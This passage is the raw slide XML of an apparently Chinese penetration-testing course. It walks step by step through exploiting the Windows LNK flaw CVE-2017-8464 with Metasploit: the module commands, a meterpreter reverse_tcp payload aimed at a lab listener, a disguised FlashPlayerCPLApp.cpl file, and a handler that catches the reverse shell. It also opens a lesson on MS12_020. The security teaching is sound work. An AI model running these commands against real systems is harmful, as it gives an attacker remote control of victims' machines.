          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236595" y="6184265"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-10打开Metasploit框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="0201060003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48665" y="189865"/>
            <a:ext cx="10515600" cy="2050415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>2.使用search搜索可利用的漏洞，输入“search cve-2017-8464”命令搜索cve-2017-8464漏洞模块，发现可利用漏洞模块“exploit/windows/fileformat/cve_2017_8464_lnk_rce”，如图3-2-11所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>3.使用漏洞模块“use exploit/windows/fileformat/cve_2017_8464_lnk_rce”进行漏洞利用，并用show options命令查询设置参数，如图3-2-12所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="图3-2-11 搜索cve-2017-8464漏洞模块"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748665" y="2386330"/>
            <a:ext cx="4835525" cy="3147060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482611" descr="图3-2-12  漏洞模块配置参数"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6442075" y="2386330"/>
            <a:ext cx="4822190" cy="3146425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143635" y="5775325"/>
            <a:ext cx="4045585" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-2-11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>搜索cve-2017-8464漏洞模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7167880" y="5775325"/>
            <a:ext cx="3495675" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-2-12  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞模块配置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="0201060003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56235"/>
            <a:ext cx="10515600" cy="5821045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>4.设置攻击载荷payload、攻击目标、监听主机参数，这里采用TCP的meterpreter反弹载荷，如图3-2-13所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>设置攻击载荷：set  payload  windows/x64/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>设置监听主机（kali）：set  lhost  192.168.66.5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>设置监听端口：set lport 5555,</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>用show options查配置参数,如图3-2-14所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482621" descr="图3-2-13  设置攻击载荷"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3134995"/>
            <a:ext cx="5005070" cy="2211705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064260" y="5506720"/>
            <a:ext cx="3277870" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-2-13  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>设置攻击载荷</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 -2147482610" descr="图3-2-14  攻击载荷参数"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6848475" y="1992630"/>
            <a:ext cx="4731385" cy="3881755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8143240" y="6056630"/>
            <a:ext cx="3035935" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-2-14  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击载荷参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea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32435"/>
            <a:ext cx="10515600" cy="5923915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>5.输入run或exploit命令开始执行。漏洞模块在/root/.msf4/local目录下生成一个FlashPlayerCPLApp.cpl的dll文件和大量的LNK文件,每个LNK文件对应一个盘符从D盘到Z盘，将FlashPlayerCPLApp.cpl复制到靶机上，当触发执行时靶机便与攻击机建立远程连接，如图3-2-15和3-2-16所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482619" descr="图3-2-15  执行攻击"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1929130"/>
            <a:ext cx="5271135" cy="4213860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 -2147482618" descr="图3-2-16 root"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect r="22554"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667500" y="1929130"/>
            <a:ext cx="5160010" cy="4065270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178560" y="6356350"/>
            <a:ext cx="3194050" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-2-15  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>执行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6951980" y="6142990"/>
            <a:ext cx="4401820" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-16 /root/.msf4/local目录下文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="0201060003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20980"/>
            <a:ext cx="10515600" cy="5973445"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤二 multi/handler模块设置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.设置攻击载荷参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置攻击载荷set payload windows/x64/meterpreter/reverse_tcp，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置监听主机（kali）：set  lhost  192.168.66.5 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置监听端口：        set  lport  5555 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用show options命令检查配置参数如图3-2-17和图3-2-18所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482617" descr="图3-2-17设置multihandler模块攻击载荷"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="945515" y="3429000"/>
            <a:ext cx="8895080" cy="2094230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3009900" y="5826125"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-17设置multi/handler模块攻击载荷</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="0201060003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2147482616" descr="图3-2-18multihandler模块配置参数"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263650" y="1247140"/>
            <a:ext cx="8903970" cy="4150995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3291840" y="5643245"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-2-18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>multi/handler模块配置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="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825881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kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3.1.1 MS12_020漏洞利用与安全加固</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【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523240" y="2275840"/>
            <a:ext cx="10311130" cy="2847340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>小王是网络公司的技术员，最近他为公司部署了一台Windows Server 2003的服务器，为了确保服务器的安全，他对服务器系统进行漏洞渗透测试，结果发现服务器系统存在远程桌面协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）远程代码执行漏洞，如果攻击者利用这个漏洞进行远程攻击，可导致服务器系统蓝屏崩溃，因此他对这个漏洞进行测试和加固，以保证系统的安全性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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7960"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.执行监听，当靶机没有触发FlashPlayerCPLApp.cpl时，处于监听状态，如图3-2-19所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>图3-2-19开始监听</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3.在靶机上运行FlashPlayerCPLApp.cpl文件，随后便会反弹shell，结果如图3-2-20所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482615" descr="图3-2-19开始监听"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691640" y="1191260"/>
            <a:ext cx="7632065" cy="1360805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 -2147482614" descr="图3-2-20建立连接"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691640" y="4062730"/>
            <a:ext cx="7499350" cy="1744345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
